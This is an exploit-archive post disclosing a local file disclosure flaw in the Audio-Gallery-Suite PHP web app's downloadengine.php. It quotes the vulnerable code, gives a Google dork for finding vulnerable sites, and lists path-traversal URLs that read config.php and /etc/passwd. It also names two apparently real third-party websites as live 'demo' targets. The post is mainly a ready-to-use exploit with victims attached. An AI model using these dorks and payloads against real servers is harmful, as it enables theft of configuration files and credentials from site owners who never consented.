Home / exploits Audio Gallery Suite Local File Disclosure
Posted on 08 July 2015
####################################################### # # [+] Exploit Title: Audio-Gallery-Suite Local File Disclosure Vulnerability # [+] Google Dork: inurl:/downloadengine.php?file= # [+] Date: July/04/2015 # [+] Exploit Author: Iranian_Dark_Coders_Team # [+] Vendor Homepage: http://robinrizvi.info # [+] Software Link: https://github.com/robinrizvi/Audio-Gallery-Suite # [+] Version: All Version # [+] Category: webapps # [+] Platform: php # [+] Tested on: Kali Linux # ####################################################### # # [+] VULNERABILITY: # # LFD vulnerable File: downloadengine.php # # Code in downloadengine.php: # # <?php # if (isset($_GET['file'])) # { # $fullfilename=$_GET['file']; # $filename=basename($fullfilename); # # //load the file # # readfile('../../../'.$fullfilename); # } # ?> # ####################################################### # # [+] Exploit: # # http://localhost/media/player/php/downloadengine.php?file=[LFD] # ####################################################### # # [+] Proof: # # http://localhost/media/player/php/downloadengine.php?file=media/player/php/downloadengine.php # # http://localhost/media/player/php/downloadengine.php?file=media/player/php/config.php # # http://localhost/media/player/php/downloadengine.php?file=../../../../../etc/passwd # ####################################################### # # [+] Demo site: # # http://thisistohi.com/en/media/player/php/downloadengine.php?file=../../../../../etc/passwd # # http://www.rikhiapeeth.in/php/downloadengine.php?file=../index.php # ####################################################### # # [+] Discovered By: Black.Hack3r # [+] We Are: Black.Hack3r,M.R.S.CO,N3O,D$@d_M@n,HOt0N,KurD_HaCK3R # [+] SpTnx: Mr.Cicili,Sec4ever,MR.0x41,M4H4N,Security,@3is And All Members In wWw.IDC-TeaM.NeT # [+] Home: http://wWw.IDC-TeaM.NeT # #######################################################
